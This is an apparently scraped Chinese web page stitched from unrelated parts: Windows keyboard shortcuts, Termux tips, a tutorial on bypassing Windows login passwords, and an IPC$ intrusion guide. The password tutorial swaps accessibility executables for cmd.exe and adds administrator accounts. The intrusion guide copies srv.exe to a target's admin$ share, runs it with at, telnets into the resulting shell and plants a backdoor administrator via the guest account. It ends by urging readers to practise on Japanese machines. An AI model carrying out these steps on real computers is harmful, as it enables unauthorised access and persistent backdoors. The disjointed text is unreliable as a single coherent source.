黑客键盘教程(黑客键盘教程图)

hacker|
111

如何像黑客一样只键盘操作

记住一下,你就不需要鼠标了

一、常见用法:

F1 显示当前程序或者windows的帮助内容。

F2 当你选中一个文件的话,这意味着“重命名”

F3 当你在桌面上的时候是打开“查找:所有文件” 对话框

F10或ALT 激活当前程序的菜单栏

windows键或CTRL+ESC 打开开始菜单

CTRL+ALT+DELETE 在win9x中打开关闭程序对话框

DELETE 删除被选择的选择项目,如果是文件,将被放入回收站

SHIFT+DELETE 删除被选择的选择项目,如果是文件,将被直接删除而不是

放入回收站

CTRL+N 新建一

2009-07-01 02:43

实用技能 | [url=javascript:;]评论(0)[/url] | 浏览(713)

转载

一、常见用法:

F1 显示当前程序或者windows的帮助内容。

F2 当你选中一个文件的话,这意味着“重命名”

F3 当你在桌面上的时候是打开“查找:所有文件” 对话框

F10或ALT 激活当前程序的菜单栏

windows键或CTRL+ESC 打开开始菜单

CTRL+ALT+DELETE 在win9x中打开关闭程序对话框

DELETE 删除被选择的选择项目,如果是文件,将被放入回收站

SHIFT+DELETE 删除被选择的选择项目,如果是文件,将被直接删除而不是

放入回收站

CTRL+N 新建一个新的文件

CTRL+O 打开“打开文件”对话框

CTRL+P 打开“打印”对话框

CTRL+S 保存当前操作的文件

CTRL+X 剪切被选择的项目到剪贴板

CTRL+或 CTRL+C 复制被选择的项目到剪贴板

SHIFT+或 CTRL+V 粘贴剪贴板中的内容到当前位置

ALT+BACKSPACE 或 CTRL+Z 撤销上一步的操作

ALT+SHIFT+BACKSPACE 重做上一步被撤销的操作

Windows键+M 最小化所有被打开的窗口。

Windows键+CTRL+M 重新将恢复上一项操作前窗口的大小和位置

Windows键+E 打开资源管理器

Windows键+F 打开“查找:所有文件”对话框

Windows键+R 打开“运行”对话框

Windows键+BREAK 打开“系统属性”对话框

Windows键+CTRL+F 打开“查找:计算机”对话框

SHIFT+F10或鼠标右击 打开当前活动项目的快捷菜单

SHIFT 在放入CD的时候按下不放,可以跳过自动播放CD。在打开wo

rd的时候按下不放,可以跳过自启动的宏

ALT+F4 关闭当前应用程序

ALT+SPACEBAR 打开程序最左上角的菜单

ALT+TAB 切换当前程序

ALT+ESC 切换当前程序

ALT+ENTER 将windows下运行的MSDOS窗口在窗口和全屏幕状态间切换

PRINT SCREEN 将当前屏幕以图象方式拷贝到剪贴板

ALT+PRINT SCREEN 将当前活动程序窗口以图象方式拷贝到剪贴板

CTRL+F4 关闭当前应用程序中的当前文本(如word中)

CTRL+F6 切换到当前应用程序中的下一个文本(加shift 可以跳到前

一个窗口)

在IE中:

ALT+RIGHT ARROW 显示前一页(前进键)

ALT+LEFT ARROW 显示后一页(后退键)

CTRL+TAB 在页面上的各框架中切换(加shift反向)

F5 刷新

CTRL+F5 强行刷新

目的快捷键

激活程序中的菜单栏 F10

执行菜单上相应的命令 ALT+菜单上带下划线的字母

关闭多文档界面程序中的当

前窗口 CTRL+ F4

关闭当前窗口或退出程序 ALT+ F4

复制 CTRL+ C

剪切 CTRL+ X

删除

显示所选对话框项目的帮助 F1

显示当前窗口的系统菜单 ALT+空格键

显示所选项目的快捷菜单 SHIFT+ F10

显示“开始”菜单 CTRL+ ESC

显示多文档界面程序的系统

菜单 ALT+连字号(-)

粘贴 CTR L+ V

切换到上次使用的窗口或者

按住 ALT然后重复按TAB,

切换到另一个窗口 ALT+ TAB

撤消 CTRL+ Z

二、使用“Windows资源管理器”的快捷键

目的快捷键

如果当前选择展开了,要折

叠或者选择父文件夹左箭头

折叠所选的文件夹 NUM LOCK+负号(-)

如果当前选择折叠了,要展开

或者选择第一个子文件夹右箭头

展开当前选择下的所有文件夹 NUM LOCK+*

展开所选的文件夹 NUM LOCK+加号(+)

在左右窗格间切换 F6

三、使用 WINDOWS键

可以使用 Microsoft自然键盘或含有 Windows徽标键的其他任何兼容键盘的以下快

捷键。

目的快捷键

在任务栏上的按钮间循环 WINDOWS+ TAB

显示“查找:所有文件” WINDOWS+ F

显示“查找:计算机” CTRL+ WINDOWS+ F

显示“帮助” WINDOWS+ F1

显示“运行”命令 WINDOWS+ R

显示“开始”菜单 WINDOWS

显示“系统属性”对话框 WINDOWS+ BREAK

显示“Windows资源管理器” WINDOWS+ E

最小化或还原所有窗口 WINDOWS+ D

撤消最小化所有窗口 SHIFT+ WINDOWS+ M

四、使用“我的电脑”和“Windows资源管理器”的快捷键

目的快捷键

关闭所选文件夹及其所有父

文件夹按住 SHIFT键再单击“关闭按钮(仅适用于“我的电脑”)

向后移动到上一个视图 ALT+左箭头

向前移动到上一个视图 ALT+右箭头

查看上一级文件夹 BACKSPACE

五、使用对话框中的快捷键

目的快捷键

取消当前任务 ESC

如果当前控件是个按钮,要

单击该按钮或者如果当前控

件是个复选框,要选择或清

除该复选框或者如果当前控

件是个选项按钮,要单击该

选项空格键

单击相应的命令 ALT+带下划线的字母

单击所选按钮 ENTER

在选项上向后移动 SHIFT+ TAB

在选项卡上向后移动 CTRL+ SHIFT+ TAB

在选项上向前移动 TAB

在选项卡上向前移动 CTRL+ TAB

如果在“另存为”或“打开”

对话框中选择了某文件夹,

要打开上一级文件夹 BACKSPACE

在“另存为”或“打开”对

话框中打开“保存到”或

“查阅” F4

刷新“另存为”或“打开”

对话框 F5

六、使用“桌面”、“我的电脑”和“Windows资源管理器”快捷键

选择项目时,可以使用以下快捷键。

目的快捷键

插入光盘时不用“自动播放”

功能按住 SHIFT插入 CD-ROM

复制文件按住 CTRL拖动文件

创建快捷方式按住 CTRL+SHIFT拖动文件

立即删除某项目而不将其放入 SHIFT+

“回收站”

显示“查找:所有文件” F3

显示项目的快捷菜单 APPLICATION键

刷新窗口的内容 F5

重命名项目 F2

选择所有项目 CTRL+ A

查看项目的属性 ALT+ ENTER或 ALT+双击

可将 APPLICATION键用于 Microsoft自然键盘或含有 APPLICATION键的其他兼容键

七、Microsoft放大程序的快捷键

这里运用Windows徽标键和其他键的组合。

快捷键目的

Windows徽标+PRINT SCREEN将屏幕复制到剪贴板(包括鼠标光标)

Windows徽标+SCROLL LOCK将屏幕复制到剪贴板(不包括鼠标光标)

Windows徽标+ PAGE UP切换反色。

Windows徽标+ PAGE DOWN切换跟随鼠标光标

Windows徽标+向上箭头增加放大率

Windows徽标+向下箭头减小放大率

八、使用辅助选项快捷键

目的快捷键

切换筛选键开关右SHIFT八秒

切换高对比度开关左ALT+左SHIFT+PRINT SCREEN

切换鼠标键开关左ALT+左SHIFT+NUM LOCK

切换粘滞键开关 SHIFT键五次

切换切换键开关 NUM LOCK五秒

破解电脑登陆密码的方法教程

由于网络安全的知识普及,很多人为了电脑数据的安全或者出于保护自己隐私的原因,对自己的电脑设置的开机密码,但是有时时间久了,电脑密码忘记了怎么办? 接下来是我为大家收集的破解电脑登陆密码教程,希望能帮到大家。

破解电脑登陆密码教程

破解电脑登陆密码教程 方法 一

电脑开机密码忘记了怎么办?如果开机的时候,界面上没有出现Administrator这个用户名,那么就在这个界面状态下按住“Ctrl”+“Alt”键,然后再连续按两次“Delete”键这时会出现一个windows的经典登录界面,用户名就是Administrator,密码为空。

破解电脑登陆密码教程方法二

1.如果你的电脑已经登录到系统,但是忘了密码,这种情况最简单

2.然后,右击用户名,点修改密码便可,无需输入久密码便可修改

打开 计算机管理 如图

3.如果系统无法登录,但是安装过DOS或者一键恢复,或者MAXDOS等,则可直接一键恢复系统,开机的时候,5秒内,按住上下键出现然后进入,直接一键恢复,便可

4.使用光盘自带的windows密码破解工具,在bios设置为光盘启动,其中的 first boot device 改为dvdcdrom 便可,然后重启OK进入光盘,点破解密码便可!

破解电脑登陆密码教程方法三:

1、重新启动计算机,开机后按下F8键不动直到高级选项画面出现后,再松开手,选择“命令提示符的安全模式”回车。

2、运行过程结束时,系统列出了系统超级用户“administrator”和本地用户“*****”的选择菜单,鼠标单击“administrator”,进入命令行模式。

3、键入命令:“net user ***** 123456 /add”,强制将“*****”用户的口令更改为“123456”,若想在此添加一新用户(如:用户名为abcdef,口令为123456)的话。

请键入“net user abcdef 123456 /add”,添加后可用“net localgroup administrators abcdef /add”命令将用户提升为系统管理组“administrators”的用户,并使其具有超级权限。

4、重新启动计算机,选择正常模式下运行,就可以用更改后的口令“123456”登录“*****”用户了。

破解电脑登陆密码教程方法四

用Windows xp系统安装光盘,以修复系统的方法,破解超级机算机管理员密码

第1步:将系统设为光盘启动,并放入系统安装光盘,当出现第一个选择界面后按回车,出现第二个选择界面后按“R”键开始修复安装,随后安装程序会检查磁盘并开始复制文件。文件复制完成后,系统将 自动重启 。

第2步:重启后,系统会进入图形化的安装界面。

注意:此时应密切注视界面的左下角,一旦出现“正在安装设备”进度条时,立即按下组合键“Shift+F10”。接着会出现意想不到的事情,一个命令提示符窗口出现在我们的面前。这是破解密码的关键所在。

第3步:在命令提示符窗口中键入“Lusrmgr.msc”并回车(不包括双引号),打开“本地用户和组”管理工具。点击左侧的“用户”然后再右击右侧的管理员账户,选择“设置密码”。

此时,会弹出一个警告窗口,大意是说修改密码后,系统中的某些信息将变得不可访问,这里主要指用EFS加密过的文件,并且此前未曾导出证书,则修改密码后这些文件将无法访问。

如果没有这种文件,我没就不要理会它,直接单击“继续”,然后输入新密码,并单击确定,然后关闭“本地用户和组”和“命令提示符”窗口,并继续完成修复安装。完成安装后,系统管理员账户就重新“激活”了。

破解电脑登陆密码教程方法五

WinXP/2000下对策:删除系统安装目录\system32 \config下的SAM文件,重新启动,此时管理员Administrator账 号已经没有密码了,用Administrator帐户登陆系统,不用输入 任何密码,进入系统后再重新设置登陆帐户密码即可。

如果是CMOS密码忘了:

将主板电池扣出来,等10分钟在反装进去即可。

不放电取消CMOS密码:

1、运行输入CMD回车打开命令提示符,输入debug 回车。

2、输入“O 70 10”回车(注意:是输入英文O,不是数字0,O与70之间有空格,70与10之间有空格)。

3、输入“O 71 10”回车(注意:是输入英文O,不是数字0,O与71之间有空格,71与10之间有空格)。

4、输入“q”回车。

5、重启电脑,已将CMOS密码清除(以上的双引号不输入)。

破解电脑登陆密码教程方法六(仅限于win2000系统的用户)

你可以在别的分区上在安装一个xp系统,硬盘分区格式要和原来的一样,并且请你注意一定不要和原来的xp安装在同一分区!在开始之前,一定要事先备份引导区mbr,备份mbr的方法有很多。

使用工具软件,如杀毒软件kv3000等。装完后用administrator登陆,现在你对原来的xp就有绝对的写权限了,你可以把原来的sam考下来,用10phtcrack得到原来的密码。

也可以把新安装的xp的winntsystem32config下的所有文件覆盖到c:winntsystem32config目录中(架设原来的xp安装在这里),然后用kv3000恢复以前悲愤的主引导区mbr,现在你就可以用administrator身份登陆xp了。

删除c:winntsystem32config目录下的sam文件,重新启动,这是,管理员administrator账号就没有密码了,这个方法对于2000 有效 对于xp无效 删除后 无法登陆windows。

方法七(仅限于 win7 系统的用户)

1找个PE盘启动电脑

2 进入PE后 到c:\windows\system32下

(1) 更改Magnify.exe 和cmd.exe 的所有者为:administrators

(2) 更改Magnify.exe 和cmd.exe 的权限 administrators为完全控制

(3)改名Magnify.exe 为Magnify.exe1 改名cmd.exe为Magnify.exe

3 更改密码

(1)重启到windows 7

(2)启用放大镜

(3)剩下的事就非常简单了,输入命令”net user”查看用户名,再输入命令”net user 用户名新密码”即可,(激活管理员帐号使用net user administrator /active:yes )。

最后关掉命令提示符窗口,在登录密码框中输入刚刚设置的新密码,看看,是不是成功进入系统了!最后,别忘了把先前移动、重命名的文件都改回去,这可是严重的后门哦!

4 忘记密码,无法登录系统。这种情况处理起来比较麻烦,我试过安全模式、Win7系统盘修复、登录WinPE,但都无法修改系统文件,貌似以前Vista那种方法不能用了。

而我的方法和登录WinPE修改文件方法类似。这里需要一张Ubuntu安装CD,我用的版本是8.10桌面版。选择光盘启动,进入Ubuntu安装界面,选择语言,然后进入第一项”试用ubuntu 而不改变……”。

接下来等待载入文件,时间会稍长一些,进入桌面之后,打开Win7的X:\windows\system32文件夹,将这里的”osk.exe”剪切到其他位置,将”cmd.exe”更名为 ”osk.exe”,然后重新从硬盘启动。

也可以尝试用Win7优化大师软件到Win7登录窗口,单击屏幕左下角的“轻松访问”图标,然后在弹出的窗口勾选“启动屏幕键盘”,单击“确定 ”,此时启动的就是命令提示符了,剩下的事就非常简单了。

输入命令”net user”查看用户名,再输入命令”net user 用户名新密码”即可,最后关掉命令提示符窗口,在登录密码框中输入刚刚设置的新密码,看看,是不是成功进入系统了!最后,别忘了把先前移动、重命名的文件都改回去。

看了“破解电脑登陆密码教程”还想看:

1. 破解路由器用户名及密码的详细图文教程

2. 如何破解Win7系统的登陆密码

3. 黑客破解密码教程

4. 怎样破解电脑密码 几分钟成高手

Termux高级终端教程

title: "Termux高级终端教程"

date: 2021-02-23T16:37:12+08:00

draft: true

tags: ['termux']

author: "dadigang"

author_cn: "大地缸"

personal: " "

可以使用缩放手势来调整其字体大小。 对!就是双指放大缩小照片那样操作。

长按屏幕会调出显示菜单项(包括复制、粘贴、更多),方便我们进行复制或者粘贴

More 菜单的说明如下:

显示隐藏式导航栏,可以新建、切换、重命名会话session和调用弹出输入法

常用键是PC端常用的按键如: ESC键、Tab键、CTR键、ALT键,有了这些按键后可以提高我们日常操作的效率,所以Termux后面的版本默认都是显示这个扩展功能按键的。 (18年的时候默认是不显示的)

打开和隐藏这个扩展功能按键目前有下面两种方法:

方法一

从左向右滑动,显示隐藏式导航栏,长按左下角的KEYBOARD

方法二

使用 Termux 快捷键: 音量+ + Q 键 或者 音量+ + K 键

这些基础知识简单了解一下就可以了,Linux 用的多了 就会慢慢熟悉理解了。

Ctrl键是终端用户常用的按键,但大多数触摸键盘都没有这个按键,因此 Termux 使用音量减小按钮来模拟Ctrl键。

例如,在触摸键盘上按音量减小+ L就相当于是键盘上按Ctrl + L的效果一样,达到清屏的效果。

Ctrl + A - 将光标移动到行首

Ctrl + C - 中止当前进程

Ctrl + D - 注销终端会话

Ctrl + E - 将光标移动到行尾

Ctrl + K - 从光标删除到行尾

Ctrl + U - 从光标删除到行首

Ctrl + L - 清除终端

Ctrl + Z - 挂起(发送SIGTSTP到)当前进程

Ctrl + alt + C - 打开新会话(仅适用于 黑客键盘)

音量加键也可以作为产生特定输入的特殊键.

音量加 + E - Esc键

音量加 + T - Tab键

音量加 + 1 - F1(音量增加 + 2 → F2…以此类推)

音量加 + 0 - F10

音量加 + B - Alt + B,使用readline时返回一个单词

音量加 + F - Alt + F,使用readline时转发一个单词

音量加 + X - Alt+X

音量加 + W - 向上箭头键

音量加 + A - 向左箭头键

音量加 + S - 向下箭头键

音量加 + D - 向右箭头键

音量加 + L - | (管道字符)

音量加 + H - 〜(波浪号字符)

音量加 + U - _ (下划线字符)

音量加 + P - 上一页

音量加 + N - 下一页

音量加 + . - Ctrl + \(SIGQUIT)

音量加 + V - 显示音量控制

音量加 + Q - 切换显示的功能键视

音量加 + K - 切换显示的功能键视图

快捷键用的熟悉的话也可以极大提高操作的效率。

Termux 除了支持 apt 命令外,还在此基础上封装了pkg命令,pkg 命令向下兼容 apt 命令。apt命令大家应该都比较熟悉了,这里直接简单的介绍下pkg命令:

除了通过上述的 pkg 命令安装软件以外,如果我们有 .deb 软件包文件,也可以使用 dpkg 进行安装。

Andorid 10 以下的版本是可以正常使用netstat 命令的,这样可以方便的查看端口开放信息

Andorid 10 版本的Termux 下无法正常使用 netstat -an 命令,国光的解决方法是安装一个 nmap,然后扫描本地端口(弯道超车):

使用 nmap 操作 :

黑客DOS命令或其它命令入侵他人电脑的具体步骤?

IPC$入侵

一 唠叨一下:

网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.

不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).

因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!

二 什么是ipc$

IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。

我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。

所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.

解惑:

1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。

也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)

2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接

3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表

三 建立ipc$连接在hack攻击中的作用

就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!

(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)

不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(

因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.

所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.

四 ipc$与空连接,139,445端口,默认共享的关系

以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)

1)ipc$与空连接:

不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.

许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).

2)ipc$与139,445端口:

ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.

3)ipc$与默认共享

默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)

五 ipc$连接失败的原因

以下5个原因是比较常见的:

1)你的系统不是NT或以上操作系统;

2)对方没有打开ipc$默认共享

3)对方未开启139或445端口(惑被防火墙屏蔽)

4)你的命令输入有误(比如缺少了空格等)

5)用户名或密码错误(空连接当然无所谓了)

另外,你也可以根据返回的错误号分析原因:

错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;

错误号51,Windows 无法找到网络路径 : 网络有问题;

错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);

错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;

错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。

错误号1326,未知的用户名或错误密码 : 原因很明显了;

错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)

错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。

关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.

六 如何打开目标的IPC$(此段引自相关文章)

首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。

七 如何防范ipc$入侵

1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)

首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享

1)察看本地共享资源

运行-cmd-输入net share

2)删除共享(每次输入一个)

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete

net share d$ /delete(如果有e,f,……可以继续删除)

3)停止server服务

net stop server /y (重新启动后server服务会重新开启)

4)修改注册表

运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。

如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务

控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师

5设置复杂密码,防止通过ipc$穷举密码

(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创)

八 相关命令

1)建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

3)映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)

如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接

net use \\IP\ipc$ /del

5)删除共享映射

net use c: /del 删除映射的c盘,其他盘类推

net use * /del 删除全部,会有提示要求按y确认

九 经典入侵模式

这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:\net time \\127.0.0.1

查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)

5. C:\net time \\127.0.0.1

再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:\WINNT\system32ntlm

输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

十 总结:

关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.

最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)

安卓黑客键盘如何设置成透明的

透明效果很好用,手机设置一语言和键盘一hacker's key设置一Teme and label setting一键盘主题一Transparent(expetimental)选上

返回开启怎么样?

透明的夜光效果

黑客hacker键盘可以设置宏吗

键盘首先支持宏按键自定义设置,才可以用这个功能的。如果不支持那就不能用。键盘有这个功能,可以下载型号相对应的驱动程序软件,然后安装 打开软件,里面就有每个按键搜索的宏按键设置的。是需要驱动软件来设置的。

3条大神的评论

  • avatar
    访客 2022-10-07 下午 10:54:04

    后在弹出的窗口勾选“启动屏幕键盘”,单击“确定 ”,此时启动的就是命令提示符了,剩下的事就非常简单了。 输入命令”net user”查看用户名,再输入命令

  • avatar
    访客 2022-10-07 下午 04:10:25

    后,系统中的某些信息将变得不可访问,这里主要指用EFS加密过的文件,并且此前未曾导出证书,则修改密码后这些文件将无法访问。 如果没有这种文件,我没就不要理会它,直接单击“继续”,然后输入

  • avatar
    访客 2022-10-07 下午 12:07:17

    终端教程title: "Termux高级终端教程" date: 2021-02-23T16:37:12+08:00 draft: true tags: ['termux'] auth

发表评论